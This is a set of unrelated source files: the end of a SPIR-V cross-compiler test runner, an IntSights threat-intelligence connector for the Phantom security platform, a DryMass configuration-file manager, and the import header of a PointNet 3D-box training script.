    for test_case_dir, test_function, optimize in test_case_dirs:
        walk_dir = os.path.join(script_args.cross_dir, test_case_dir)
        for dirpath, dirnames, filenames in os.walk(walk_dir):
            # Sorting keeps the walk (and hence test order) deterministic.
            dirnames.sort()
            reldir = os.path.relpath(dirpath, script_args.cross_dir)
            for filename in sorted(filenames):
                shader = os.path.join(reldir, filename)
                if not test_regex or re.search(test_regex, shader):
                    tests.append((test_function, test_env,
                                  shader, filename, optimize))
        if script_args.run_spvc_tests:
            walk_dir = os.path.join(script_args.spvc_test_dir, test_case_dir)
            for dirpath, dirnames, filenames in os.walk(walk_dir):
                dirnames.sort()
                reldir = os.path.relpath(dirpath, script_args.spvc_test_dir)
                for filename in sorted(filenames):
                    shader = os.path.join(reldir, filename)
                    if not test_regex or re.search(test_regex, shader):
                        tests.append((test_function, test_env,
                                      shader, filename, optimize))

    # jobs == 0 lets multiprocessing pick a worker count.
    if not script_args.jobs:
        pool = Pool()
    else:
        pool = Pool(script_args.jobs)

    # run all test without --no-validate flag
    test_env.run_spvc_with_validation = True
    results = pool.map(work_function, tests)
    # This can occur if -f is passed in with a pattern that doesn't match to
    # anything, or only matches to tests that are skipped.
    if not results:
        print('Did not receive any results from workers...')
        return False
    successes, failures = zip(*results)

    # run all tests with --no-validate flag
    test_env.run_spvc_with_validation = False
    results = pool.map(work_function, tests)
    # This can occur if -f is passed in with a pattern that doesn't match to
    # anything, or only matches to tests that are skipped.
    # This branch should be unreachable since the early check would have been activated
    if not results:
        print('Did not receive any results from workers (happened while --no-validate run)...')
        return False
    successes_without_validation, _ = zip(*results)

    # Flattening lists of lists, and convert path markers if needed
    successes = list(itertools.chain.from_iterable(successes))
    successes = list(
        map(lambda x: (x[0].replace(os.path.sep, '/'), x[1]), successes))
    failures = list(itertools.chain.from_iterable(failures))
    failures = list(
        map(lambda x: (x[0].replace(os.path.sep, '/'), x[1]), failures))
    successes_without_validation = list(itertools.chain.from_iterable(successes_without_validation))
    successes_without_validation = list(
        map(lambda x: (x[0].replace(os.path.sep, '/'), x[1]), successes_without_validation))
    failures.sort()

    # Pick the known-failure list matching the parser that was exercised.
    fail_file = ""
    if script_args.run_spvc_tests:
        fail_file = os.path.join(os.path.dirname(
            os.path.realpath(__file__)), 'known_spvc_failures')
        print('Parser = spvc, Tests Directory = spirv-cross/ + spvc/ fail_file = known_spvc_failures')
    else:
        fail_file = os.path.join(os.path.dirname(
            os.path.realpath(__file__)), 'known_failures')
        print('Parser = spirv-cross, Tests Directory = spirv-cross/ + fail_file = known_failures')

    print('{} test cases'.format(len(successes) + len(failures)))
    print('{} passed and'.format(len(successes)))
    print('{} passed with --no-validation flag'.format(len(successes_without_validation)))

    if script_args.update_known_failures:
        print('Updating {}'.format(fail_file))
        with open(fail_file, 'w+') as f:
            for failure in failures:
                f.write('{},{}\n'.format(failure[0], failure[1]))

    # Each line of the expectation files is "<shader path>,<True|False>"
    # where the boolean is the optimize flag.
    with open(fail_file, 'r') as f:
        known_failures = f.read().splitlines()
    known_failures = set(
        map(lambda x: (x.split(',')[0], x.split(',')[1] == 'True'), known_failures))
    invalid_file = os.path.join(os.path.dirname(
        os.path.realpath(__file__)), 'known_invalids')
    with open(invalid_file, 'r') as f:
        known_invalids = f.read().splitlines()
    known_invalids = set(
        map(lambda x: (x.split(',')[0], x.split(',')[1] == 'True'), known_invalids))
    unconfirmed_invalid_file = os.path.join(os.path.dirname(
        os.path.realpath(__file__)), 'unconfirmed_invalids')
    with open(unconfirmed_invalid_file, 'r') as f:
        unconfirmed_invalids = f.read().splitlines()
    unconfirmed_invalids = set(
        map(lambda x: (x.split(',')[0], x.split(',')[1] == 'True'), unconfirmed_invalids))

    # Diff actual results against expectations.
    unexpected_successes = []
    unexpected_failures = []
    unexpected_invalids = []
    unexpected_valids = []
    if not script_args.test_filter:
        missing_failures = []
    for success in successes:
        if success in known_failures:
            unexpected_successes.append(success)
        if success in known_invalids:
            unexpected_valids.append(success)
    for failure in failures:
        if failure not in known_failures:
            if failure not in known_invalids:
                unexpected_failures.append(failure)
    if not script_args.test_filter:
        for known_failure in known_failures:
            if known_failure not in successes and known_failure not in failures:
                missing_failures.append(known_failure)
    # A test that only passes without validation is a suspected invalid.
    for invalid in successes_without_validation:
        if invalid not in successes:
            if invalid not in unconfirmed_invalids and invalid not in known_invalids:
                unexpected_invalids.append(invalid)

    test_env.log_unexpected(unexpected_successes, 'success')
    test_env.log_unexpected(unexpected_failures, 'failure')
    test_env.log_unexpected(unexpected_invalids, 'invalid')
    test_env.log_unexpected(unexpected_valids, 'valid')
    if not script_args.test_filter:
        test_env.log_missing_failures(missing_failures)
    if not script_args.test_filter:
        return len(unexpected_successes) != 0 or len(unexpected_failures) != 0 or len(missing_failures) != 0
    else:
        return len(unexpected_successes) != 0 or len(unexpected_failures) != 0
if __name__ == '__main__':
    # Exit status is non-zero (truthy) when unexpected results occurred.
    sys.exit(main())
|
<gh_stars>0
# File: intsights_connector.py
#
# Copyright (c) 2019-2022 IntSights Cyber Intelligence Ltd.
#
# This unpublished material is proprietary to IntSights.
# All rights reserved. The methods and
# techniques described herein are considered trade secrets
# and/or confidential. Reproduction or distribution, in whole
# or in part, is forbidden except by express written permission
# of IntSights.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under
# the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific language governing permissions
# and limitations under the License.
from urllib.parse import unquote
# Phantom imports
import phantom.app as phantom
import requests
from phantom.app import BaseConnector
class IntSightsConnector(BaseConnector):
    """
    Represent a connector module that implements the actions that are provided by the app.
    IntSightsConnector is a class that is derived from the BaseConnector class.
    """

    # IntSights endpoints
    INTSIGHTS_BASE_URL = 'https://api.ti.insight.rapid7.com/public/v1'
    INTSIGHTS_SEARCH_IOC_URL = INTSIGHTS_BASE_URL + '/iocs/ioc-by-value'
    INTSIGHTS_GET_API_VERSION_URL = INTSIGHTS_BASE_URL + '/api/version'
    INTSIGHTS_GET_SOURCES_URL = INTSIGHTS_BASE_URL + '/iocs/sources'
    INTSIGHTS_GET_ALERTS_LIST_URL = INTSIGHTS_BASE_URL + '/data/alerts/alerts-list'
    INTSIGHTS_GET_COMPLETE_ALERT_URL = INTSIGHTS_BASE_URL + '/data/alerts/get-complete-alert/{alert_id}'
    INTSIGHTS_CLOSE_ALERT_URL = INTSIGHTS_BASE_URL + '/data/alerts/close-alert/{alert_id}'
    INTSIGHTS_ALERT_TAKEDOWN_URL = INTSIGHTS_BASE_URL + '/data/alerts/takedown-request/{alert_id}'
    INTSIGHTS_INVESTIGATION_LINK_URL = 'https://dashboard.ti.insight.rapid7.com/#/tip/investigation/?q={ioc}'

    # Supported actions
    ACTION_ID_TEST_ASSET_CONNECTIVITY = 'test_asset_connectivity'
    ACTION_ID_HUNT_FILE = 'hunt_file'
    ACTION_ID_HUNT_DOMAIN = 'hunt_domain'
    ACTION_ID_HUNT_IP = 'hunt_ip'
    ACTION_ID_HUNT_URL = 'hunt_url'
    ACTION_ID_ON_POLL = 'on_poll'
    ACTION_ID_CLOSE_ALERT = 'close_alert'
    ACTION_ID_TAKEDOWN_REQUEST = 'takedown_request'

    # Messages
    INTSIGHTS_CONNECTION_SUCCESSFUL = 'Test Connectivity passed'
    INTSIGHTS_ERROR_NO_CONTENT = 'No data was returned from IntSights'
    INTSIGHTS_ERROR_CONNECTION = 'Error getting data from IntSights. {error}'
    INTSIGHTS_ERROR_AUTH = 'Authentication error'
    INTSIGHTS_ERROR_INIT_SOURCES = 'Failed to initiate sources map. {error}'
    INTSIGHTS_ERROR_CLOSE_ALERT = 'Failed to close alert ID {alert_id}'
    INTSIGHTS_ERROR_TAKEDOWN_ALERT = 'Failed to takedown alert ID {alert_id}'
    PHANTOM_ERROR_SAVE_CONTAINER = 'An error occurred while creating container for IntSights alert ID {alert_id}'
    PHANTOM_ERROR_SAVE_ARTIFACT = 'An error occurred while creating artifact for IntSights alert ID {alert_id}'
    INTSIGHTS_ERR_UNABLE_TO_PARSE_JSON_RESPONSE = "Unable to parse response as JSON. {error}"
    INTSIGHTS_ERR_INVALID_RESPONSE = "Invalid response received from the server while fetching the list of alert ids"

    # Constants relating to 'get_error_message_from_exception'
    ERR_MSG_UNAVAILABLE = "Error message unavailable. Please check the asset configuration and|or action parameters."

    # Constants relating to 'validate_integer'
    INTSIGHTS_VALID_INT_MSG = "Please provide a valid integer value in the '{param}' parameter"
    INTSIGHTS_NON_NEG_NON_ZERO_INT_MSG = "Please provide a valid non-zero positive integer value in '{param}' parameter"
    INTSIGHTS_NON_NEG_INT_MSG = "Please provide a valid non-negative integer value in the '{param}' parameter"

    def __init__(self):
        """Initialize global variables."""
        super(IntSightsConnector, self).__init__()
        # Authenticated requests.Session, set up in initialize()
        self._session = None
        # Map of IntSights source ID -> source name, filled by _init_sources()
        self._sources = None

    def _get_error_message_from_exception(self, e):
        """
        Get appropriate error message from the exception.

        :param e: Exception object
        :return: error message
        """
        error_code = None
        error_msg = self.ERR_MSG_UNAVAILABLE

        try:
            if hasattr(e, "args"):
                if len(e.args) > 1:
                    error_code = e.args[0]
                    error_msg = e.args[1]
                elif len(e.args) == 1:
                    error_msg = e.args[0]
        except Exception:
            pass

        if not error_code:
            error_text = "Error Message: {}".format(error_msg)
        else:
            error_text = "Error Code: {}. Error Message: {}".format(error_code, error_msg)

        return error_text

    def _validate_integer(self, action_result, parameter, key, allow_zero=False):
        """
        Validate an integer.

        :param action_result: Action result or BaseConnector object
        :param parameter: input parameter
        :param key: input parameter message key
        :allow_zero: whether zero should be considered as valid value or not
        :return: status phantom.APP_ERROR/phantom.APP_SUCCESS, integer value of the parameter or None in case of failure
        """
        if parameter is not None:
            try:
                # Reject values like "1.5" but accept "2.0"
                if not float(parameter).is_integer():
                    return action_result.set_status(phantom.APP_ERROR, self.INTSIGHTS_VALID_INT_MSG.format(param=key)), None
                parameter = int(parameter)
            except Exception:
                return action_result.set_status(phantom.APP_ERROR, self.INTSIGHTS_VALID_INT_MSG.format(param=key)), None

            if parameter < 0:
                return action_result.set_status(phantom.APP_ERROR, self.INTSIGHTS_NON_NEG_INT_MSG.format(param=key)), None
            if not allow_zero and parameter == 0:
                return action_result.set_status(
                    phantom.APP_ERROR,
                    self.INTSIGHTS_NON_NEG_NON_ZERO_INT_MSG.format(param=key)
                ), None

        return phantom.APP_SUCCESS, parameter

    def initialize(self):
        """Initialize the global variables with its value and validate it."""
        config = self.get_config()
        session = requests.Session()
        session.headers.update(
            {
                'Accept': 'application/json',
                'X-App-Name': 'Phantom_1.0',
            }
        )
        account_id = config['account_id'].encode("utf8")
        session.auth = requests.auth.HTTPBasicAuth(
            account_id,
            config['api_key'],
        )
        self._session = session
        return phantom.APP_SUCCESS

    def finalize(self):
        """Perform some final operations or clean up operations."""
        self._session = None
        return phantom.APP_SUCCESS

    def _test_asset_connectivity(self):
        """Verify connectivity and credentials against the API version endpoint."""
        action_result = self.add_action_result(phantom.ActionResult())
        try:
            response = self._session.get(self.INTSIGHTS_GET_API_VERSION_URL)
            if response.status_code == 401:
                return action_result.set_status(phantom.APP_ERROR, self.INTSIGHTS_ERROR_AUTH)
            response.raise_for_status()
        except requests.HTTPError as e:
            error_msg = self._get_error_message_from_exception(e)
            return action_result.set_status(phantom.APP_ERROR, self.INTSIGHTS_ERROR_CONNECTION.format(error=error_msg))
        except Exception as e:
            return action_result.set_status(phantom.APP_ERROR, self.INTSIGHTS_ERROR_CONNECTION.format(error=e))

        self.save_progress(self.INTSIGHTS_CONNECTION_SUCCESSFUL)
        return action_result.set_status(phantom.APP_SUCCESS)

    def _init_sources(self, action_result):
        """Fetch the IOC sources map and cache it as {source_id: source_name}."""
        try:
            sources_map = self._session.get(self.INTSIGHTS_GET_SOURCES_URL).json()
            self._sources = {
                value['_id']: value['Name']
                for category in sources_map.values()
                for value in category
            }
            return phantom.APP_SUCCESS
        except Exception as e:
            error_msg = self._get_error_message_from_exception(e)
            self.save_progress(self.INTSIGHTS_ERROR_INIT_SOURCES.format(error=error_msg))
            return action_result.set_status(phantom.APP_ERROR, self.INTSIGHTS_ERROR_INIT_SOURCES.format(error=error_msg))

    def _search_ioc(self, value, action_result):
        """Look up a single IOC value.

        Returns (status, ioc_data) where ioc_data is None when nothing was
        found or an error occurred.
        """
        self.save_progress('Searching for IOC value: ' + value)
        try:
            response = self._session.get(self.INTSIGHTS_SEARCH_IOC_URL, params={'iocValue': value})
            # 204 means the IOC is unknown to IntSights; treated as success with no data
            if response.status_code == 204:
                return action_result.set_status(phantom.APP_SUCCESS, self.INTSIGHTS_ERROR_NO_CONTENT), None
            response.raise_for_status()
        except requests.HTTPError as e:
            error_msg = unquote(self._get_error_message_from_exception(e))
            return action_result.set_status(phantom.APP_ERROR, self.INTSIGHTS_ERROR_CONNECTION.format(error=error_msg)), None

        try:
            ioc_data = response.json()
        except Exception as e:
            error_msg = self._get_error_message_from_exception(e)
            return action_result.set_status(
                phantom.APP_ERROR,
                self.INTSIGHTS_ERR_UNABLE_TO_PARSE_JSON_RESPONSE.format(error=error_msg)
            ), None

        ioc_data['InvestigationLink'] = self.INTSIGHTS_INVESTIGATION_LINK_URL.format(ioc=value)
        source_name = ''
        if self._sources:
            source_name = self._sources.get(ioc_data.get('SourceID', ""))
        ioc_data['SourceName'] = source_name
        return phantom.APP_SUCCESS, ioc_data

    def _hunt_file(self, param):
        """Handle the 'hunt file' action: look up a file hash IOC."""
        action_result = self.add_action_result(phantom.ActionResult(dict(param)))
        ret_val = self._init_sources(action_result)
        if phantom.is_fail(ret_val):
            return action_result.get_status()
        value = param['hash']
        ret_val, results = self._search_ioc(value, action_result)
        if phantom.is_fail(ret_val) or not results:
            return action_result.get_status()
        action_result.add_data(results)
        return action_result.set_status(phantom.APP_SUCCESS, 'File information retrieved')

    def _hunt_domain(self, param):
        """Handle the 'hunt domain' action: look up a domain IOC."""
        action_result = self.add_action_result(phantom.ActionResult(dict(param)))
        ret_val = self._init_sources(action_result)
        if phantom.is_fail(ret_val):
            return action_result.get_status()
        value = param['domain']
        ret_val, results = self._search_ioc(value, action_result)
        if phantom.is_fail(ret_val) or not results:
            return action_result.get_status()
        action_result.add_data(results)
        return action_result.set_status(phantom.APP_SUCCESS, 'Domain information retrieved')

    def _hunt_ip(self, param):
        """Handle the 'hunt ip' action: look up an IP IOC."""
        action_result = self.add_action_result(phantom.ActionResult(dict(param)))
        ret_val = self._init_sources(action_result)
        if phantom.is_fail(ret_val):
            return action_result.get_status()
        value = param['ip']
        ret_val, results = self._search_ioc(value, action_result)
        if phantom.is_fail(ret_val) or not results:
            return action_result.get_status()
        action_result.add_data(results)
        return action_result.set_status(phantom.APP_SUCCESS, 'IP information retrieved')

    def _hunt_url(self, param):
        """Handle the 'hunt url' action: look up a URL IOC."""
        action_result = self.add_action_result(phantom.ActionResult(dict(param)))
        ret_val = self._init_sources(action_result)
        if phantom.is_fail(ret_val):
            return action_result.get_status()
        value = param['url']
        ret_val, results = self._search_ioc(value, action_result)
        if phantom.is_fail(ret_val) or not results:
            return action_result.get_status()
        action_result.add_data(results)
        return action_result.set_status(phantom.APP_SUCCESS, 'URL information retrieved')

    def _get_artifact(self, alert):
        """Build a Phantom artifact dict from a complete IntSights alert."""
        cef = {
            'Subtype': alert.get('Details', {}).get('SubType'),
        }
        # 'Assets'/'Tags' may be absent or explicitly null in the alert JSON;
        # guard with `or []` so the comprehensions do not raise TypeError.
        assets = [asset.get('Value') for asset in alert.get('Assets') or []]
        if assets:
            cef['Assets'] = assets
        tags = [tag.get('Name') for tag in alert.get('Details', {}).get('Tags') or []]
        if tags:
            cef['Tags'] = tags
        source_date = alert.get('Details', {}).get('Source', {}).get('Date', '')
        if source_date:
            cef['Source Date'] = source_date
        artifact = {
            'label': 'IntSights Alert',
            'name': alert.get('Details', {}).get('Title'),
            'description': alert.get('Details', {}).get('Description'),
            'type': alert.get('Details', {}).get('Type'),
            'severity': alert.get('Details', {}).get('Severity'),
            'start_time': alert.get('FoundDate'),
            'source_data_identifier': alert.get('_id'),
            'data': alert,
            'cef': cef,
        }
        return artifact

    def _get_alert_ids(self, param, action_result):
        """Fetch the list of alert IDs found in the last 10 days.

        Returns (status, alert_ids) with an empty list on error or no content.
        """
        try:
            # start time is considered as last 10 days (timestamps in ms)
            start_time = param['end_time'] - (432000000 * 2)
            params = {
                'foundDateFrom': start_time,
                'foundDateTo': param['end_time'],
            }
            response = self._session.get(self.INTSIGHTS_GET_ALERTS_LIST_URL, params=params)
            if response.status_code == 204:
                return action_result.set_status(phantom.APP_SUCCESS), []
            response.raise_for_status()
            try:
                alert_ids = response.json()
                if not isinstance(alert_ids, list):
                    self.debug_print("{}. Alert IDs: {}".format(self.INTSIGHTS_ERR_INVALID_RESPONSE, alert_ids))
                    return action_result.set_status(phantom.APP_ERROR, self.INTSIGHTS_ERR_INVALID_RESPONSE), []
            except Exception as e:
                error_msg = self._get_error_message_from_exception(e)
                return action_result.set_status(
                    phantom.APP_ERROR,
                    self.INTSIGHTS_ERR_UNABLE_TO_PARSE_JSON_RESPONSE.format(error=error_msg)
                ), []
        except Exception as e:
            error_msg = self._get_error_message_from_exception(e)
            return action_result.set_status(phantom.APP_ERROR, self.INTSIGHTS_ERROR_CONNECTION.format(error=error_msg)), []

        return phantom.APP_SUCCESS, alert_ids

    def _on_poll(self, param):
        """Handle the 'on poll' action: ingest recent alerts as containers/artifacts."""
        action_result = self.add_action_result(phantom.ActionResult(dict(param)))
        ret_val, alert_ids = self._get_alert_ids(param, action_result)
        if phantom.is_fail(ret_val):
            return action_result.get_status()

        # Cap ingestion at the requested container count, if provided.
        max_results = param.get("container_count", len(alert_ids))
        if max_results < len(alert_ids):
            alert_ids = alert_ids[:max_results]

        try:
            for alert_id in alert_ids:
                alert = self._session.get(self.INTSIGHTS_GET_COMPLETE_ALERT_URL.format(alert_id=alert_id)).json()
                artifact = self._get_artifact(alert)
                container = {
                    'name': '{title} - {id}'.format(title=alert.get('Details', {}).get('Title'), id=alert_id),
                    'description': 'Unresolved IntSights Alert',
                    'severity': alert.get('Details', {}).get('Severity'),
                    'source_data_identifier': alert_id,
                }
                status, msg, container_id_ = self.save_container(container)
                if phantom.is_fail(status):
                    self.save_progress(self.PHANTOM_ERROR_SAVE_CONTAINER.format(alert_id=alert_id))
                    self.debug_print('Failed to save container', dump_object=container)
                    return action_result.set_status(
                        phantom.APP_ERROR,
                        self.PHANTOM_ERROR_SAVE_CONTAINER.format(alert_id=alert_id)
                    )
                artifact['container_id'] = container_id_
                status, message, _ = self.save_artifacts([artifact])
                if phantom.is_fail(status):
                    self.save_progress(self.PHANTOM_ERROR_SAVE_ARTIFACT.format(alert_id=alert_id))
                    self.debug_print('Failed to save artifact', dump_object=artifact)
                    return action_result.set_status(
                        phantom.APP_ERROR,
                        self.PHANTOM_ERROR_SAVE_ARTIFACT.format(alert_id=alert_id)
                    )
            return action_result.set_status(phantom.APP_SUCCESS)
        except Exception as e:
            error_msg = self._get_error_message_from_exception(e)
            return action_result.set_status(phantom.APP_ERROR, 'Failed to get data {}'.format(error_msg))

    def _get_closure_json(self, param, action_result):
        """Build the close-alert request body from action parameters.

        Returns (status, closure_json); closure_json is {} on validation failure.
        """
        closure_json = dict()
        closure_json['Reason'] = param['reason']
        free_text = param.get('free_text')
        if free_text:
            closure_json['FreeText'] = free_text
        is_hidden = param.get('is_hidden')
        if is_hidden:
            closure_json['IsHidden'] = is_hidden
        alert_rate = param.get('rate')
        if alert_rate is not None:
            # Integer validation for 'rate' parameter
            ret_val, alert_rate = self._validate_integer(action_result, alert_rate, 'rate', True)
            if phantom.is_fail(ret_val):
                return action_result.get_status(), {}
            closure_json['Rate'] = alert_rate
        return phantom.APP_SUCCESS, closure_json

    def _close_alert(self, param):
        """Handle the 'close alert' action."""
        action_result = self.add_action_result(phantom.ActionResult(dict(param)))
        alert_id = param['alert_id']
        ret_val, closure_json = self._get_closure_json(param, action_result)
        if phantom.is_fail(ret_val):
            return action_result.get_status()
        try:
            response = self._session.patch(self.INTSIGHTS_CLOSE_ALERT_URL.format(alert_id=alert_id), json=closure_json)
            if response.status_code in [400, 403, 500]:
                return action_result.set_status(phantom.APP_ERROR, self.INTSIGHTS_ERROR_CLOSE_ALERT.format(alert_id=alert_id))
            response.raise_for_status()
            return action_result.set_status(phantom.APP_SUCCESS, "Successfully closed the alert")
        except Exception as e:
            error_msg = unquote(self._get_error_message_from_exception(e))
            # Bug fix: this path previously reported the *takedown* error
            # message; it must use the close-alert message.
            msg = "{}. {}".format(self.INTSIGHTS_ERROR_CLOSE_ALERT.format(alert_id=alert_id), error_msg)
            return action_result.set_status(phantom.APP_ERROR, msg)

    def _takedown_request(self, param):
        """Handle the 'takedown request' action."""
        action_result = self.add_action_result(phantom.ActionResult(dict(param)))
        alert_id = param['alert_id']
        try:
            response = self._session.patch(self.INTSIGHTS_ALERT_TAKEDOWN_URL.format(alert_id=alert_id))
            if response.status_code in [400, 403, 500]:
                return action_result.set_status(phantom.APP_ERROR, self.INTSIGHTS_ERROR_TAKEDOWN_ALERT.format(alert_id=alert_id))
            response.raise_for_status()
            return action_result.set_status(phantom.APP_SUCCESS, "Takedown request successfully executed")
        except Exception as e:
            error_msg = unquote(self._get_error_message_from_exception(e))
            msg = "{}. {}".format(self.INTSIGHTS_ERROR_TAKEDOWN_ALERT.format(alert_id=alert_id), error_msg)
            return action_result.set_status(phantom.APP_ERROR, msg)

    def handle_action(self, param):
        """Get current action identifier and call member function of its own to handle the action."""
        ret_val = phantom.APP_ERROR
        action_id = self.get_action_identifier()
        if action_id == self.ACTION_ID_TEST_ASSET_CONNECTIVITY:
            ret_val = self._test_asset_connectivity()
        elif action_id == self.ACTION_ID_HUNT_FILE:
            ret_val = self._hunt_file(param)
        elif action_id == self.ACTION_ID_HUNT_DOMAIN:
            ret_val = self._hunt_domain(param)
        elif action_id == self.ACTION_ID_HUNT_IP:
            ret_val = self._hunt_ip(param)
        elif action_id == self.ACTION_ID_HUNT_URL:
            ret_val = self._hunt_url(param)
        elif action_id == self.ACTION_ID_ON_POLL:
            ret_val = self._on_poll(param)
        elif action_id == self.ACTION_ID_CLOSE_ALERT:
            ret_val = self._close_alert(param)
        elif action_id == self.ACTION_ID_TAKEDOWN_REQUEST:
            ret_val = self._takedown_request(param)
        else:
            raise ValueError('Action {} is not supported'.format(action_id))
        return ret_val
if __name__ == '__main__':
    # Stand-alone test harness: run a single action described by a JSON
    # file given as the first command-line argument.
    import json
    import sys

    if len(sys.argv) < 2:
        print('No test json specified as input')
        sys.exit(1)

    with open(sys.argv[1]) as json_file:
        in_json = json.loads(json_file.read())
    print(json.dumps(in_json, indent=4))

    connector = IntSightsConnector()
    connector.print_progress_message = True
    action_response = connector._handle_action(json.dumps(in_json), None)
    print(json.dumps(json.loads(action_response), indent=4))
    sys.exit(0)
|
<filename>drymass/cli/config.py
import pathlib
from . import definitions
from . import parse_funcs
from .._version import version
#: DryMass configuration file name (appended when ConfigFile is given a directory)
FILE_CONFIG = "drymass.cfg"
class ConfigFile(object):
    def __init__(self, path):
        """DryMass configuration file management

        Manage configuration file of an experimental data set
        with restrictions imposed by
        :data:`drymass.cli.definitions.config`.

        Parameters
        ----------
        path: str
            path to the configuration file or a folder containing the
            configuration file :data:`FILE_CONFIG`.
        """
        path = pathlib.Path(path).resolve()
        if path.is_dir():
            path = path / FILE_CONFIG
        if not path.exists():
            path.touch()
        self.path = path

    def __getitem__(self, section):
        """Get a configuration section

        Parameters
        ----------
        section: str
            the configuration section

        Returns
        -------
        sectiondict: dict
            the configuration section dictionary
        """
        datadict = self._parse()
        if section in datadict:
            return datadict[section]
        elif section in definitions.config:
            # return default values
            secd = {}
            for kk in definitions.config[section]:
                secd[kk] = definitions.config[section][kk][0]
            # write result
            datadict[section] = secd
            self._write(datadict)
            return secd
        else:
            raise ValueError("Unknown section title: {}".format(section))

    def __setitem__(self, section, sectiondict):
        """Replace a section in the configuration file

        Parameters
        ----------
        section: str
            the section name
        sectiondict: dict
            the configuration dictionary

        Notes
        -----
        The previous content of the configuration section
        in the configuration file is replaced.
        """
        datadict = self._parse()
        for key in sectiondict:
            self._check_value(section, key, sectiondict[key])
        datadict[section] = sectiondict
        self._write(datadict)

    def _check_value(self, section, key, value):
        """Check if a section/key/value pair is valid

        Raises `ValueError` if this is not the case.
        Returns the parsed value, or `None` for unset values.
        """
        if section not in definitions.config:
            raise ValueError("Unknown section title: {}".format(section))
        if key not in definitions.config[section]:
            raise ValueError("Unknown key: {}: {}".format(section, key))
        # For versions > 0.8.1, unknown configuration keys are `None`.
        # Prior versions also used `np.nan`. Keep "nan" in the list
        # below for backwards compatibility.
        if value in [None, "nan", "none", "None", "()", "[]"]:
            if definitions.config[section][key][0] is not None:
                msg = "Unset value '{}' not allowed for [{}]: {}!".format(
                    value, section, key)
                raise ValueError(msg)
            ret_value = None
        else:
            type_func = definitions.config[section][key][1]
            try:
                type_func(value)
            except BaseException as e:
                msg = "Failed to parse: '[{}]: {}={}'".format(section, key,
                                                              value)
                e.args = ("{}; {}".format(msg, ", ".join(e.args)),)
                raise
            ret_value = type_func(value)
        return ret_value

    def _parse_compat(self, section, key, value):
        """Translate section/key/value triples written by older DryMass versions."""
        if section == "bg":
            # drymass < 0.1.3: API changed in qpimage 0.1.6
            if (key in ["amplitude profile", "phase profile"]
                    and value == "ramp"):
                value = "tilt"
        elif section == "roi":
            # drymass <= 0.1.5: keys were renamed to reflect pixel units
            if key in ["dist border", "exclude overlap", "pad border"]:
                key += " px"
        return key, value

    def _parse(self, autocomplete=True):
        """Return configuration dictionary

        Parameters
        ----------
        autocomplete: bool
            whether to fill in default configuration values when
            the corresponding keys are missing in a given section.
            Note that missing sections are not added. If missing
            keys are found, the original configuration file is
            overridden with the new data. Disabling autocompletion
            also prevents writing to the configuration file.

        Returns
        -------
        datadict: dict of dicts
            configuration dictionary

        Notes
        -----
        This function is private, because the autocomplete feature is
        actually a desired behavior to keep the configuration file
        human-readable. Normal users should not be able to use it,
        because the concept could be considered confusing.
        """
        with self.path.open() as fd:
            data = fd.readlines()
        outdict = {}
        for line in data:
            line = line.strip()
            if (line.startswith("#") or
                    len(line) == 0):
                pass
            elif line.startswith("["):
                sec = line.strip("[]")
                outdict[sec] = {}
            else:
                # Bug fix: split only on the first "=" so that values
                # containing "=" (e.g. URLs, expressions) are preserved.
                key, val = line.split("=", 1)
                key = key.strip()
                val = val.strip()
                # backwards compatibility:
                key, val = self._parse_compat(sec, key, val)
                val = self._check_value(sec, key, val)
                outdict[sec][key] = val
        if autocomplete:
            # Insert default variables where missing
            must_write = False
            for sec in outdict:
                for key in definitions.config[sec]:
                    if key not in outdict[sec]:
                        outdict[sec][key] = definitions.config[sec][key][0]
                        must_write = True
            if must_write:
                # Update the configuration file
                self._write(outdict)
        return outdict

    def _write(self, datadict):
        """Write configuration dictionary

        Parameters
        ----------
        datadict: dict of dicts
            the full configuration

        Notes
        -----
        The configuration key values are converted to the correct
        dtype before writing using the definitions given in
        definitions.py.
        """
        keys = sorted(list(datadict.keys()))
        lines = ["# DryMass version {}".format(version),
                 "# Configuration file documented at: ",
                 "# https://drymass.readthedocs.io/en/stable/"
                 + "sec_gs_configuration_file.html",
                 ]
        for kk in keys:
            lines.append("")
            lines.append("[{}]".format(kk))
            subkeys = sorted(list(datadict[kk].keys()))
            for sk in subkeys:
                value = datadict[kk][sk]
                typefunc = definitions.config[kk][sk][1]
                if value is not None:
                    value = typefunc(value)
                    if typefunc in [parse_funcs.strlist,
                                    parse_funcs.strlist_vsort]:
                        # cosmetics for e.g. '[roi]: ignore data'
                        value = ", ".join(value)
                lines.append("{} = {}".format(sk, value))
        for ii in range(len(lines)):
            lines[ii] += "\n"
        with self.path.open("w") as fd:
            fd.writelines(lines)

    def remove_section(self, section):
        """Remove a section from the configuration file"""
        datadict = self._parse(autocomplete=False)
        datadict.pop(section)
        self._write(datadict)

    def set_value(self, section, key, value):
        """Set a configuration key value

        Parameters
        ----------
        section: str
            the configuration section
        key: str
            the configuration key in `section`
        value:
            the configuration key value

        Notes
        -----
        Valid section and key names are defined in definitions.py
        """
        # load, update, and save
        sec = self[section]
        sec[key] = value
        self[section] = sec

    def update(self, other):
        """Update the current configuration with data from another

        Parameters
        ----------
        other: ConfigFile
            the configuration file from which data is imported into
            the current configuration

        Notes
        -----
        None-valued keys are ignored.
        """
        other_dict = other._parse(autocomplete=False)
        for sec in other_dict:
            for key in other_dict[sec]:
                value = other_dict[sec][key]
                if value is not None:
                    self.set_value(section=sec,
                                   key=key,
                                   value=value)
|
from __future__ import print_function
import argparse
from cProfile import label
from dis import dis
import os
import random
from socket import MSG_DONTROUTE
from sklearn import cluster
import torch
import torch.nn.parallel
import torch.optim as optim
import torch.utils.data
from pointnet.dataset import LidarDataset, BoxDataset
from pointnet.box_model import BoxNet
import torch.nn.functional as F
from tqdm import tqdm
import numpy as np
import matplotlib.pyplot as plt
import time
from model_utils import BoxNetLoss, parse_output_to_tensors, get_box3d_corners_helper, get_box3d_corners
import open3d as o3d
from provider import angle2class, size2class, class2angle, class2size, compute_box3d_iou, size2class2, give_pred_box_corners, get_3d_box
#from viz_util import draw_lidar, draw_lidar_simple
# Shared loss module and discretization constants for the box regression head.
Loss = BoxNetLoss()
NUM_HEADING_BIN = 12  # number of discrete heading-angle bins
NUM_SIZE_CLUSTER = 3 # one cluster for each type
NUM_OBJECT_POINT = 512  # NOTE(review): appears unused in this script — confirm
